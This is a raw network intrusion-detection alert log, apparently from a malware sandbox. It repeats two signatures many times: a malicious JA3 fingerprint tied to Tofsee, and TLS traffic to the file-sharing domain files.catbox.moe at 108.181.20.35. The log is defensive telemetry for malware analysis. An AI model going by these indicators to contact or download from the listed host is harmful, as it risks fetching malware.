TCP 192.168.56.101:49249 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49509 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49464 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49485 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49464 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49249 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49485 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49508 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49464 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49412 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49485 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49412 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49251 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49412 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49510 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49251 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49472 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49510 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49472 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49487 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49251 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49487 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49510 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49472 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49418 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49487 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49418 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49418 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49263 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49517 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49473 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49263 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49517 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49473 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49498 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49498 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49263 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49517 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49473 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49452 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49430 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49473 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49430 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49430 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49522 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49266 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49522 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49266 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49460 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49476 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49522 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49460 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49476 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49266 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49439 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49460 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49439 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49476 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49439 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49269 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49269 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49480 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49477 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49480 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49269 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49477 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49440 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49480 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49440 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49477 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49440 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49273 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49273 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49483 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49483 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49494 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49273 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49441 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49494 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49441 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49483 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49494 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49441 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49440 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49282 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49282 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49490 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49490 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49499 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49282 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49499 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49490 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49449 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49499 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49449 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49283 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49449 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49283 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49491 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49491 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49503 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49283 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49503 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49491 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49450 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49503 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49450 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49450 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49284 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49505 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49284 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49505 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49506 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49506 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49284 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49505 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49471 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49506 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49471 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49506 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49471 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49289 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49513 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49289 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49513 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49289 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49513 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49511 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49474 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49511 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49474 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49511 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49498 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49474 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49290 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49290 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49519 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49290 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49515 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49519 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49482 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49515 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49482 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49519 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49504 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49515 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49482 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49504 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49306 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49306 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49504 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49306 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49526 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49486 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49526 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49520 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49486 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49507 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49520 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49311 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49526 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49507 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49486 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49311 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49520 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49507 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49311 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49488 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49488 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49521 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49512 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49521 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49316 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49488 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49512 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49316 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49521 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49512 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49316 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49316 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49489 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49489 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49516 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49489 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49516 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49322 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49322 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49516 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49322 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49492 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49492 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49518 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
